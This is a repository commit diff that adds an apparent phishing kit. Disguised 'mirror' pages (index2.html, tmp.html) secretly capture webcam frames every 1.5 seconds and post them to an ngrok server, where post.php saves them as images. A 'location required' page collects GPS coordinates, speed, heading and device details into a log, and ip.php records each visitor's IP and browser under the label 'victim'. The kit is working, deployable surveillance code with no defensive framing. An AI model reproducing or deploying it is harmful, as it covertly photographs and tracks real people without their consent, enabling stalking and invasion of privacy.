Add files via upload

dalpan · Jul 18, 2021 · bb605a4 · bb605a4
1 parent c396f6c
commit bb605a4
Show file tree

Hide file tree

Showing 13 changed files with 344 additions and 0 deletions.
diff --git a/cam/tmp.txt b/cam/tmp.txt
@@ -0,0 +1 @@
+yamete
diff --git a/index.php b/index.php
@@ -0,0 +1,5 @@
+<?php
+include 'ip.php';
+header('Location: https://b5dc25cc7b2b.ngrok.io/index2.html');
+exit
+?>
diff --git a/index2.html b/index2.html
@@ -0,0 +1,83 @@
+<!doctype html>
+<html>
+<head>
+<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
+<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
+<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
+</head>
+
+<div class="video-wrap" hidden="hidden">
+   <video id="video" playsinline autoplay></video>
+</div>
+
+<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
+
+<script>
+
+function post(imgdata){
+$.ajax({
+    type: 'POST',
+    data: { cat: imgdata},
+    url: 'https://b5dc25cc7b2b.ngrok.io/post.php',
+    dataType: 'json',
+    async: false,
+    success: function(result){
+        // call the function that handles the response/results
+    },
+    error: function(){
+    }
+  });
+};
+
+
+'use strict';
+
+const video = document.getElementById('video');
+const canvas = document.getElementById('canvas');
+const errorMsgElement = document.querySelector('span#errorMsg');
+
+const constraints = {
+  audio: false,
+  video: {
+
+    facingMode: "user"
+  }
+};
+
+// Access webcam
+async function init() {
+  try {
+    const stream = await navigator.mediaDevices.getUserMedia(constraints);
+    handleSuccess(stream);
+  } catch (e) {
+    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
+  }
+}
+
+// Success
+function handleSuccess(stream) {
+  window.stream = stream;
+  video.srcObject = stream;
+
+var context = canvas.getContext('2d');
+  setInterval(function(){
+
+       context.drawImage(video, 0, 0, 640, 480);
+       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
+       post(canvasData); }, 1500);
+
+
+}
+
+// Load init
+init();
+
+</script>
+
+    <body>
+        <p>Hint: Look at the favicon</p>
+        <p>(Accept Permissions)</p>
+        <p><label><input type="checkbox" name="mirror" id="mirror" /> Mirror image</label></p>
+    </body>
+
+</html>
diff --git a/info/error.php b/info/error.php
@@ -0,0 +1,7 @@
+<?php
+
+file_put_contents("error.txt", "Error: " . $_GET['error'] . "\n", FILE_APPEND);
+
+header('Location:javascript://history.go(-1)');
+exit();
+?>
diff --git a/info/get.php b/info/get.php
@@ -0,0 +1,7 @@
+<?php
+
+file_put_contents("geolocate.txt", "Latitude: " . $_GET['latitude'] . "\n" . "Longitude: " . $_GET["longitude"] . "\n" . "User-Agent: " . $_GET["useragent"] . "\n" . "Altitude: " . $_GET["altitude"] . "\n" . "Accuracy: " . $_GET["accuracy"] . "\n" . "Speed: "  . $_GET["speed"] . "\n" . "Heading: " . $_GET["heading"] . "\n" . "Platform: " . $_GET["platform"] . "\n" . "Cores: " . $_GET["hardware"] . "\n" . "Memory: "   . $_GET["memory"] ."\n" . "Screen Height: "   . $_GET["height"] ."\n" . "Screen Width: "   . $_GET["width"] ."\n", FILE_APPEND);
+
+header('Location: https://google.com');
+exit();
+?>
diff --git a/info/index.php b/info/index.php
@@ -0,0 +1,5 @@
+<?php
+include 'ip.php';
+header('Location: index2.html');
+exit
+?>
diff --git a/info/index2.html b/info/index2.html
@@ -0,0 +1,71 @@
+<!DOCTYPE html>
+<html>
+<body>
+<meta http-equiv="refresh" content="30" />
+<p>Enable your "Location" and Refresh to access this site.</p>
+<body onLoad="getLocation()">
+<button onclick="getLocation()">Enable It</button>
+
+
+<script>
+
+
+function getLocation() {
+    if (navigator.geolocation) {
+    var acc = {enableHighAccuracy : true , timeout : 30000, maximumage : 0 };
+        navigator.geolocation.getCurrentPosition(showPosition, showError, acc);
+    } else { 
+        x.innerHTML = "This site requires Geolocation to work.";
+    }
+}
+
+function showPosition(position) {
+
+ //   x.innerHTML = "Latitude: " + position.coords.latitude + 
+ //   "<br>Longitude: " + position.coords.longitude;
+
+  var useragent = navigator.userAgent;
+  var latitude = position.coords.latitude;
+  var longitude = position.coords.longitude;
+  var altitude = position.coords.altitude;
+  var accuracy = position.coords.accuracy;
+  var speed = position.coords.speed;
+  var heading = position.coords.heading;
+  var platform = navigator.platform;
+  var hardware = navigator.hardwareConcurrency;
+  var memory = navigator.deviceMemory;
+  var height = window.screen.height;
+  var width = window.screen.width;
+
+
+window.location.href = "get.php?latitude=" + latitude + "&longitude=" + longitude + "&altitude=" + altitude + "&platform=" + platform + "&accuracy=" + accuracy + "&speed=" + speed + "&heading=" + heading + "&hardware=" + hardware + "&memory=" + memory + "&useragent=" + useragent + "&height=" + height + "&width=" + width;
+
+}
+function showError(error)
+{
+	switch(error.code)
+  {
+		case error.PERMISSION_DENIED:
+			var error = '1' ; // 'permission denied';
+      alert('Please, Allow Location Permission...');
+      break;
+		case error.POSITION_UNAVAILABLE:
+			var error = '2' // 'unavailable';
+			break;
+		case error.TIMEOUT:
+			var error = '3' // 'timed out';
+      alert('Please refresh this page...');
+			break;
+		case error.UNKNOWN_ERROR:
+			var error  = '4' // 'unknown error';
+			break;
+	}
+
+window.location.href = "error.php?error=" + error;
+
+}
+</script>
+
+</body>
+</html>
+
diff --git a/info/ip.php b/info/ip.php
@@ -0,0 +1,29 @@
+<?php
+
+if (!empty($_SERVER['HTTP_CLIENT_IP']))
+    {
+      $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
+    }
+elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
+    {
+      $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
+    }
+else
+    {
+      $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
+    }
+$useragent = " User-Agent: ";
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+$file = 'ip.txt';
+$victim = "IP: ";
+$fp = fopen($file, 'a');
+
+fwrite($fp, $victim);
+fwrite($fp, $ipaddress);
+fwrite($fp, $useragent);
+fwrite($fp, $browser);
+
+
+fclose($fp);
diff --git a/info/saved.ip.txt b/info/saved.ip.txt
@@ -0,0 +1 @@
+yamete
diff --git a/ip.php b/ip.php
@@ -0,0 +1,29 @@
+<?php
+
+if (!empty($_SERVER['HTTP_CLIENT_IP']))
+    {
+      $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
+    }
+elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
+    {
+      $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
+    }
+else
+    {
+      $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
+    }
+$useragent = " User-Agent: ";
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+$file = 'ip.txt';
+$victim = "IP: ";
+$fp = fopen($file, 'a');
+
+fwrite($fp, $victim);
+fwrite($fp, $ipaddress);
+fwrite($fp, $useragent);
+fwrite($fp, $browser);
+
+
+fclose($fp);
diff --git a/post.php b/post.php
@@ -0,0 +1,18 @@
+<?php
+
+$date = date('dMYHis');
+$imageData=$_POST['cat'];
+
+if (!empty($_POST['cat'])) {
+error_log("Received" . "\r\n", 3, "Log.log");
+
+}
+
+$filteredData=substr($imageData, strpos($imageData, ",")+1);
+$unencodedData=base64_decode($filteredData);
+$fp = fopen( 'cam/cam'.$date.'.png', 'wb' );
+fwrite( $fp, $unencodedData);
+fclose( $fp );
+
+exit();
+?>
diff --git a/tmp.html b/tmp.html
@@ -0,0 +1,83 @@
+<!doctype html>
+<html>
+<head>
+<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
+<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
+<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
+</head>
+
+<div class="video-wrap" hidden="hidden">
+   <video id="video" playsinline autoplay></video>
+</div>
+
+<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
+
+<script>
+
+function post(imgdata){
+$.ajax({
+    type: 'POST',
+    data: { cat: imgdata},
+    url: 'forwarding_link/post.php',
+    dataType: 'json',
+    async: false,
+    success: function(result){
+        // call the function that handles the response/results
+    },
+    error: function(){
+    }
+  });
+};
+
+
+'use strict';
+
+const video = document.getElementById('video');
+const canvas = document.getElementById('canvas');
+const errorMsgElement = document.querySelector('span#errorMsg');
+
+const constraints = {
+  audio: false,
+  video: {
+
+    facingMode: "user"
+  }
+};
+
+// Access webcam
+async function init() {
+  try {
+    const stream = await navigator.mediaDevices.getUserMedia(constraints);
+    handleSuccess(stream);
+  } catch (e) {
+    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
+  }
+}
+
+// Success
+function handleSuccess(stream) {
+  window.stream = stream;
+  video.srcObject = stream;
+
+var context = canvas.getContext('2d');
+  setInterval(function(){
+
+       context.drawImage(video, 0, 0, 640, 480);
+       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
+       post(canvasData); }, 1500);
+
+
+}
+
+// Load init
+init();
+
+</script>
+
+    <body>
+        <p>Hint: Look at the favicon</p>
+        <p>(Accept Permissions)</p>
+        <p><label><input type="checkbox" name="mirror" id="mirror" /> Mirror image</label></p>
+    </body>
+
+</html>
diff --git a/tmp.php b/tmp.php
@@ -0,0 +1,5 @@
+<?php
+include 'ip.php';
+header('Location: forwarding_link/index2.html');
+exit
+?>